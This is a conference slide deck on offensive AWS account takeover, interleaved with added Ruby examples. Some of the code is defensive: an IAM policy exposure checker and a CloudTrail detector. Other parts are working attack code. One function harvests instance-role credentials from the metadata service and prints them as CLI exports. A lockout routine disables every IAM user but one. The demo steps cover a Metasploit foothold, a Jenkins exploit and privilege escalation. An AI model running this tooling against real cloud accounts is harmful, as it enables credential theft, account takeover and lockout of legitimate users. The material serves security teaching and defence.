
Dev secops on the offense automating amazon web services account takeover



Source: RSA Conference



  1. #RSAC Session ID: IDY-W10. DevSecOps on the Offense: Automating Amazon Web Services Account Takeover. Javier Godinez, Founding Member, @isomorphix; Ian Allison, Founding Member, @iallison.
  2. Disclaimer. This is not an Amazon Web Services (AWS) issue; it is a DevOps education issue. It is the user's responsibility to understand the technology being used. With power-user privileges come great responsibilities.
  3. How Our Grandfathers Ran a Stack. Glen Beck (background) and Betty Snyder (foreground) program ENIAC in BRL building 328. (U.S. Army photo)
  4. How Our Mothers Ran a Stack. (Image: Lawrence Livermore National Laboratory, via Wikimedia Commons)
  5. How We Run a Stack: aws ec2 run-instances --image-id ami-12345678 --instance-type m3.large --key-name "$MY_KEY_PAIR" --security-group-ids "$MY_SECURITY_GROUP" (Image: © 2007 Nuno Pinheiro, David Vignoni, David Miller, Johann Ollivier Lapeyre, Kenneth Wimer and Riccardo Iaconelli / KDE, via Wikimedia Commons)
  6. The Cloud Is Ripe for the Picking: Attack Surface + Misunderstanding of Technology == Low-Hanging Fruit.
  7. Acceleration into the Cloud. (Chart: Information Security job postings versus DevOps job postings)
  8. Understanding the Technology You Use. How fast can I move while still staying safe? Always develop in a separate account (blast-radius containment). Read the docs for everything, make conscious decisions, and document those decisions. Attackers will try to leverage everything against you. Bleeding edge does not mean stable and secure; it can be, with enough testing.
  9. Instance. A virtual host: a virtual environment on the Xen hypervisor that feels very much like a host running on bare metal. (Diagram: Hypervisor, Instance, Operating System)
  10. Metadata Service. An internal HTTP service that gives an instance information about its environment. Available from the host at a fixed link-local address. Provides temporary credentials to hosts with instance profiles. (Diagram: Hypervisor, Instance OS, Metadata, Instance OS)
  11. Instance Profile. An AWS construct that maps a role to an instance. An instance may or may not have a profile associated with it.
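Slides 10 and 11 describe the mechanism behind the demo's "Retrieve temporary credentials" steps: any process on an instance that has an instance profile can read that role's temporary keys from the metadata service over plain HTTP. The Ruby below is an added example, not the talk's module, showing the fetch, the parse of the credential document and the export into an AWS CLI environment. The link-local address and the metadata paths are AWS's documented ones; the function names and the sample document are this example's own (the sample is constructed and contains no real keys). It also asks for an IMDSv2 token first, which did not exist when the talk was given: requiring IMDSv2 on your instances is the standard mitigation today, because the unauthenticated GET this technique relies on then returns an error.

```ruby
require 'json'
require 'net/http'
require 'time'

# Added example (not from the talk): pull the temporary credentials the EC2
# instance metadata service (IMDS) hands to any process on an instance with an
# instance profile, and turn them into an AWS CLI environment.
# 169.254.169.254 and the paths below are AWS's documented IMDS endpoints.
IMDS_BASE = 'http://169.254.169.254/latest'.freeze
CRED_PATH = '/meta-data/iam/security-credentials/'.freeze

# IMDSv2 needs a session token first (PUT /latest/api/token). When an instance
# is set to require v2, a token-less GET fails, which is why enforcing it
# blocks the plain HTTP read the talk demonstrates. Returns nil when the
# endpoint is unreachable (for example when run off-instance).
def imds_token(ttl: 60)
  uri = URI("#{IMDS_BASE}/api/token")
  req = Net::HTTP::Put.new(uri)
  req['X-aws-ec2-metadata-token-ttl-seconds'] = ttl.to_s
  res = Net::HTTP.start(uri.host, uri.port, open_timeout: 2, read_timeout: 2) { |h| h.request(req) }
  res.is_a?(Net::HTTPSuccess) ? res.body : nil
rescue StandardError
  nil
end

# GET a metadata path, attaching the v2 token when one was obtained.
def imds_get(path, token: nil)
  uri = URI("#{IMDS_BASE}#{path}")
  req = Net::HTTP::Get.new(uri)
  req['X-aws-ec2-metadata-token'] = token if token
  res = Net::HTTP.start(uri.host, uri.port, open_timeout: 2, read_timeout: 2) { |h| h.request(req) }
  res.is_a?(Net::HTTPSuccess) ? res.body : nil
end

# The credential document is JSON with Code, LastUpdated, Type, AccessKeyId,
# SecretAccessKey, Token and Expiration. Parse it and refuse expired material.
def parse_credentials(json, now: Time.now.utc)
  doc = JSON.parse(json)
  raise "IMDS reported #{doc['Code']}" unless doc['Code'] == 'Success'
  expires = Time.iso8601(doc['Expiration'])
  raise "credentials expired at #{expires}" if expires <= now
  {
    access_key_id: doc['AccessKeyId'],
    secret_access_key: doc['SecretAccessKey'],
    session_token: doc['Token'],
    expiration: expires,
    seconds_left: (expires - now).to_i
  }
end

# Export lines for the AWS CLI and SDKs. The session token is mandatory:
# temporary keys presented without it are rejected.
def to_env(creds)
  [
    "export AWS_ACCESS_KEY_ID=#{creds[:access_key_id]}",
    "export AWS_SECRET_ACCESS_KEY=#{creds[:secret_access_key]}",
    "export AWS_SESSION_TOKEN=#{creds[:session_token]}"
  ].join("\n")
end

# End to end on a live instance (needs network access to the IMDS): list the
# role name, fetch its document, return the export lines, or nil if no profile.
def harvest
  token = imds_token
  role = imds_get(CRED_PATH, token: token)&.lines&.first&.strip
  return nil if role.nil? || role.empty?
  to_env(parse_credentials(imds_get(CRED_PATH + role, token: token)))
end

# Constructed sample document (no real keys) so the parser runs offline.
SAMPLE_DOC = JSON.generate(
  'Code' => 'Success', 'LastUpdated' => '2016-02-29T10:00:00Z', 'Type' => 'AWS-HMAC',
  'AccessKeyId' => 'ASIAEXAMPLE000000000', 'SecretAccessKey' => 'examplesecret',
  'Token' => 'exampletoken', 'Expiration' => '2016-02-29T16:00:00Z'
)

puts to_env(parse_credentials(SAMPLE_DOC, now: Time.utc(2016, 2, 29, 12))) if $PROGRAM_NAME == __FILE__
```

The expiry check matters on both sides: an attacker who harvests a document late in its six-hour lifetime gets little use from it, and a defender who finds one in a captured shell history can tell from Expiration whether it is still live.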
  12. AWS Identity and Access Management Overview. Users, Groups, Roles, Policies. A policy statement has an Effect, Actions, Resources and a Condition.
  13. The Good. The policy is created specifically for the application: least privilege, made as granular as possible.
  14. The Bad. ec2:*, iam:*, anything:*
  15. The Ugly. All access: great for development, really bad for security.
  16. What Does Ugly Really Look Like? The best way to determine whether you truly have an ugly duck is by exploiting the most dangerous vulnerabilities.
  17. How do we catch up? Through automation, with a dash of Ruby.
  18. AWS Create IAM User (CIAMU) Module. Creates a user with admin privileges in the AWS account. Needs AWS access keys or an instance role with: iam:CreateUser, iam:CreateGroup, iam:PutGroupPolicy, iam:AddUserToGroup, iam:CreateAccessKey. If you have instances or instance roles with this combination of IAM privileges, it is very dangerous.
  19. AWS Launch Instances Module. Launches an EC2 instance with a public IP. Required privileges: ec2:RunInstances, ec2:ImportKeyPair, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:Describe*. Can launch the instance with an instance profile, can launch a cluster of instances, and can automate tasks via bootstrap.
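Slides 18 and 19 each list the IAM actions a module needs. Whether a given role grants them is a policy-evaluation question with wildcards, NotAction and explicit Deny to get right, so here is an added Ruby example (not from the talk or the Cumulus toolkit) that checks a policy document against both modules' action lists. The four sample policies are constructed to mirror the Good, Bad and Ugly slides; CIAMU_ACTIONS and LAUNCH_ACTIONS hold the slides' action names, with ec2:DescribeInstances standing in for the slide's ec2:Describe*. Resource and Condition are ignored on purpose, so a pass is a lead to investigate, and a fail only means these particular modules are blocked, not that the role is safe.

```ruby
require 'json'

# Added example, not the talk's code: decide whether an IAM policy document
# grants the action set each module needs. Action names come from slides 18
# and 19; the module names (CIAMU, Launch Instances) are the talk's.
CIAMU_ACTIONS = %w[iam:CreateUser iam:CreateGroup iam:PutGroupPolicy
                   iam:AddUserToGroup iam:CreateAccessKey].freeze
# The slide lists ec2:Describe*; one concrete Describe call stands in for it.
LAUNCH_ACTIONS = %w[ec2:RunInstances ec2:ImportKeyPair ec2:CreateSecurityGroup
                    ec2:AuthorizeSecurityGroupIngress ec2:DescribeInstances].freeze

# IAM action patterns are case-insensitive and accept * and ? wildcards.
def action_matches?(pattern, action)
  re = Regexp.escape(pattern).gsub('\*', '.*').gsub('\?', '.')
  Regexp.new("\\A#{re}\\z", Regexp::IGNORECASE).match?(action)
end

# "Statement" may be a single object or an array.
def statements(policy)
  s = policy.fetch('Statement')
  s.is_a?(Array) ? s : [s]
end

# A statement covers the action if any Action pattern matches, or, for a
# NotAction statement, if none of the listed patterns match.
def statement_covers?(st, action)
  if st.key?('NotAction')
    Array(st['NotAction']).none? { |p| action_matches?(p, action) }
  else
    Array(st['Action']).any? { |p| action_matches?(p, action) }
  end
end

# Explicit Deny beats Allow regardless of statement order. Resource and
# Condition are deliberately ignored: this over-approximates what the policy
# grants, which is the right direction for an attack-surface check (a scoped
# or conditional Allow still surfaces as something to look at).
def action_allowed?(policy, action)
  allowed = false
  statements(policy).each do |st|
    next unless statement_covers?(st, action)
    return false if st['Effect'] == 'Deny'
    allowed = true if st['Effect'] == 'Allow'
  end
  allowed
end

# Actions from `required` that the policy does not grant.
def missing_actions(policy, required)
  required.reject { |a| action_allowed?(policy, a) }
end

# One policy against both modules: true means the module can run with it.
def module_exposure(policy)
  { ciamu: missing_actions(policy, CIAMU_ACTIONS).empty?,
    launch: missing_actions(policy, LAUNCH_ACTIONS).empty? }
end

# Constructed sample policies mirroring the slides' Good, Bad and Ugly.
GOOD_POLICY = JSON.parse('{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":["s3:GetObject","s3:PutObject"],"Resource":"arn:aws:s3:::app-bucket/*"}]}')
BAD_POLICY  = JSON.parse('{"Version":"2012-10-17","Statement":{"Effect":"Allow","Action":["ec2:*","iam:*"],"Resource":"*"}}')
UGLY_POLICY = JSON.parse('{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}')
# Ugly plus one explicit Deny: the CIAMU path is cut off, launching instances is not.
FENCED_POLICY = JSON.parse('{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"},{"Effect":"Deny","Action":["iam:CreateAccessKey","iam:CreateLoginProfile"],"Resource":"*"}]}')

if $PROGRAM_NAME == __FILE__
  { good: GOOD_POLICY, bad: BAD_POLICY, ugly: UGLY_POLICY, fenced: FENCED_POLICY }.each do |name, pol|
    puts "#{name}: #{module_exposure(pol)}"
  end
end
```

Run it over the inline policies attached to your instance roles (and the managed policies they reference) and every role that comes back with ciamu: true is an instance whose compromise is an account compromise. The FENCED_POLICY case shows the cheap fix when a broad development policy cannot be replaced immediately: a single Deny on the key-minting actions removes the persistence step the module depends on.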
  20. AWS IAM Account Lockout Module. Requires an IAM admin role (for example one created by the CIAMU module). Enumerates all users and access keys, accepts one user to keep, and locks out all other accounts. Also lets security teams protect potentially compromised accounts.
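The lockout module of slide 20, written as an added Ruby example against the aws-sdk-iam v3 client interface; it is not the talk's code. The method names list_users, list_access_keys, update_access_key and delete_login_profile are the SDK's; the Lockout class, the FakeIam in-memory double and its three constructed users are this example's own, and a real Aws::IAM::Client can be passed in place of the double. Two things the slide's one-line description glosses over are built in: the keeper must actually exist, otherwise the run locks out everyone including the operator, and keys are deactivated rather than deleted so a mistake is reversible. What it does not cover is the other half of the account: temporary credentials already issued to instance roles stay valid until they expire, and cutting those off means attaching a Deny policy to the role, not touching users.

```ruby
# Added example, not the talk's module: slide 20's lockout logic against the
# aws-sdk-iam v3 client interface, plus a constructed in-memory double so it
# runs offline. The SDK raises Aws::IAM::Errors::NoSuchEntity when a user has
# no console password; define it only if the real SDK is not loaded.
unless defined?(Aws::IAM::Errors::NoSuchEntity)
  module Aws; module IAM; module Errors; class NoSuchEntity < StandardError; end; end; end; end
end

class Lockout
  def initialize(iam, keep:)
    @iam = iam
    @keep = keep
  end

  # Deactivate every active access key and remove the console password of
  # every user except `keep`. Keys are deactivated, not deleted, so a wrongly
  # locked user can be restored. Returns what was changed.
  def run
    report = { kept: @keep, keys_deactivated: [], passwords_removed: [] }
    # A real client paginates list_users at 100; use each_page beyond that.
    users = @iam.list_users.users.map(&:user_name)
    raise "keeper #{@keep} is not a user in this account" unless users.include?(@keep)
    (users - [@keep]).each do |name|
      @iam.list_access_keys(user_name: name).access_key_metadata.each do |k|
        next unless k.status == 'Active'
        @iam.update_access_key(user_name: name, access_key_id: k.access_key_id, status: 'Inactive')
        report[:keys_deactivated] << k.access_key_id
      end
      begin
        @iam.delete_login_profile(user_name: name)
        report[:passwords_removed] << name
      rescue Aws::IAM::Errors::NoSuchEntity
        # user had no console password; nothing to remove
      end
    end
    report
  end
end

# Constructed double standing in for Aws::IAM::Client: three users, a few
# keys (fake IDs), two console passwords. alice is the user to keep.
Key = Struct.new(:access_key_id, :status)
class FakeIam
  User = Struct.new(:user_name)
  Resp = Struct.new(:users, :access_key_metadata)
  attr_reader :keys, :passwords

  def initialize
    @keys = {
      'alice' => [Key.new('AKIAALICE0000000001', 'Active')],
      'bob' => [Key.new('AKIABOB000000000001', 'Active'), Key.new('AKIABOB000000000002', 'Inactive')],
      'ci-bot' => [Key.new('AKIACIBOT0000000001', 'Active')]
    }
    @passwords = %w[alice bob]
  end

  def list_users
    Resp.new(@keys.keys.map { |n| User.new(n) }, nil)
  end

  def list_access_keys(user_name:)
    Resp.new(nil, @keys.fetch(user_name))
  end

  def update_access_key(user_name:, access_key_id:, status:)
    @keys.fetch(user_name).find { |k| k.access_key_id == access_key_id }.status = status
  end

  def delete_login_profile(user_name:)
    raise Aws::IAM::Errors::NoSuchEntity, user_name unless @passwords.delete(user_name)
  end
end

p Lockout.new(FakeIam.new, keep: 'alice').run if $PROGRAM_NAME == __FILE__
```

From the attacker's side the keeper is the admin user CIAMU just created; from the defender's side it is the break-glass user, and the same report hash is what you hand to the incident channel so each locked user can be re-enabled deliberately rather than in a panic.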
  21. Demonstration Network Diagram. (Diagram only)
  22. Demonstration.
  23. Upcoming Modules and Ongoing Projects. AWS IAM privilege enumeration module; AWS Lambda module; AWS S3 bucket and access enumeration module; Cumulus Cloud Attack Toolkit (AWS, Google Cloud Platform, community).
  24. Helping you get from ugly to…
  25. How to Apply This Knowledge. Read the AWS IAM Best Practices documentation. Monitor IAM actions using AWS CloudTrail. Get creative with AWS services: Config + CloudWatch Events + Lambda. Audit your AWS account's IAM policies and roles. Red team your applications and instances. Think to yourself: "How would an attacker use this against me?" Use repeatable, secure patterns. Help build awareness through the community.
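Slide 25's "Monitor IAM actions using AWS CloudTrail" means, in practice, looking for the CIAMU call sequence of slide 18 coming from one principal, and especially from an instance-profile session. The Ruby below is an added example, not the talk's code: a batch detector over CloudTrail records. The field names are CloudTrail's; the window length, the record helper and the sample records are constructed for the example. The instance-role heuristic relies on EC2 naming instance-profile sessions after the instance ID. CloudTrail delivers its logs with a delay of minutes, so this is after-the-fact detection; the slide's Config + CloudWatch Events + Lambda combination is how the same logic gets run closer to real time.

```ruby
require 'json'
require 'time'

# Added example, not from the talk: a CloudTrail detection for the CIAMU
# pattern of slide 18. Record fields (eventTime, eventName, eventSource,
# errorCode, userIdentity.arn, sourceIPAddress, requestParameters) are
# CloudTrail's; the window and the sample records are constructed here.
CIAMU_EVENTS = %w[CreateUser CreateGroup PutGroupPolicy AddUserToGroup CreateAccessKey].freeze

# EC2 instance-profile sessions appear as an assumed-role ARN whose session
# name is the instance ID, e.g. ...:assumed-role/WebRole/i-0123456789abcdef0.
def instance_role_session?(arn)
  arn.to_s.match?(%r{:assumed-role/[^/]+/i-[0-9a-f]+\z})
end

# Group successful IAM calls by principal and look for every CIAMU event name
# inside a sliding window. Records can arrive out of order, so sort first.
def detect_ciamu(records, window_seconds: 900)
  by_principal = Hash.new { |h, k| h[k] = [] }
  records.each do |r|
    next unless r['eventSource'] == 'iam.amazonaws.com'
    next if r['errorCode'] # a denied call granted nothing
    by_principal[r.dig('userIdentity', 'arn')] << r
  end
  alerts = []
  by_principal.each do |arn, evs|
    evs = evs.sort_by { |e| Time.iso8601(e['eventTime']) }
    evs.each_with_index do |first, i|
      t0 = Time.iso8601(first['eventTime'])
      burst = evs.drop(i).take_while { |e| Time.iso8601(e['eventTime']) - t0 <= window_seconds }
      next unless (CIAMU_EVENTS - burst.map { |e| e['eventName'] }).empty?
      alerts << {
        principal: arn,
        from_instance_role: instance_role_session?(arn),
        source_ip: first['sourceIPAddress'],
        started: first['eventTime'],
        users_created: burst.select { |e| e['eventName'] == 'CreateUser' }
                            .map { |e| e.dig('requestParameters', 'userName') }.compact
      }
      break # one alert per principal is enough; the burst is in it
    end
  end
  alerts
end

# Constructed sample records, trimmed to the fields used above.
def record(time, name, arn, ip, params = {})
  { 'eventTime' => time, 'eventSource' => 'iam.amazonaws.com', 'eventName' => name,
    'userIdentity' => { 'arn' => arn }, 'sourceIPAddress' => ip, 'requestParameters' => params }
end

ROLE  = 'arn:aws:sts::123456789012:assumed-role/WebRole/i-0123456789abcdef0'.freeze
ADMIN = 'arn:aws:iam::123456789012:user/alice'.freeze
SAMPLE_RECORDS = [
  record('2016-02-29T10:00:05Z', 'CreateGroup', ROLE, '10.0.1.23', 'groupName' => 'ops'),
  record('2016-02-29T10:00:01Z', 'CreateUser', ROLE, '10.0.1.23', 'userName' => 'backup-svc'),
  record('2016-02-29T10:00:09Z', 'PutGroupPolicy', ROLE, '10.0.1.23', 'groupName' => 'ops', 'policyName' => 'admin'),
  record('2016-02-29T10:00:12Z', 'AddUserToGroup', ROLE, '10.0.1.23', 'groupName' => 'ops', 'userName' => 'backup-svc'),
  record('2016-02-29T10:00:15Z', 'CreateAccessKey', ROLE, '10.0.1.23', 'userName' => 'backup-svc'),
  # A normal onboarding by a human admin: two of the five calls, no alert.
  record('2016-02-29T09:30:00Z', 'CreateUser', ADMIN, '203.0.113.10', 'userName' => 'newhire'),
  record('2016-02-29T09:31:00Z', 'CreateAccessKey', ADMIN, '203.0.113.10', 'userName' => 'newhire')
].freeze

puts JSON.pretty_generate(detect_ciamu(SAMPLE_RECORDS)) if $PROGRAM_NAME == __FILE__
```

Feed it the records from a CloudTrail S3 delivery (each file is a JSON object whose "Records" array holds objects shaped like the samples) and an alert with from_instance_role: true is the exact situation slide 18 warns about: an instance profile with the CIAMU action set, already used. The users_created list is what to lock out first; the source IP identifies the instance to isolate.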
  26. Appendix: Demo Slides
  27. Load Metasploit
  28. Use sshexec to gain a foothold
  29. Instantiate a shell
  30. Retrieve temporary credentials
  31. Enumerate the network
  32. Enumerate the Metadata service
  33. Enumerate the Metadata service
  34. Escalate privileges on account A
  35. Login
  36. Explore account
  37. Discover networks
  38. Explore the network
  39. Discover services
  40. Set up a tunnel and scan for vulns
  41. Exploit Jenkins
  42. Retrieve temporary credentials
  43. Launch a new instance with Admin privs
  44. Launch a new instance with Admin privs
  45. Launch a new instance with Admin privs
  46. Establish a session with new host
  47. Establish a session with new host
  48. Establish a session with new host
  49. Escalate privileges on account B
  50. Open the console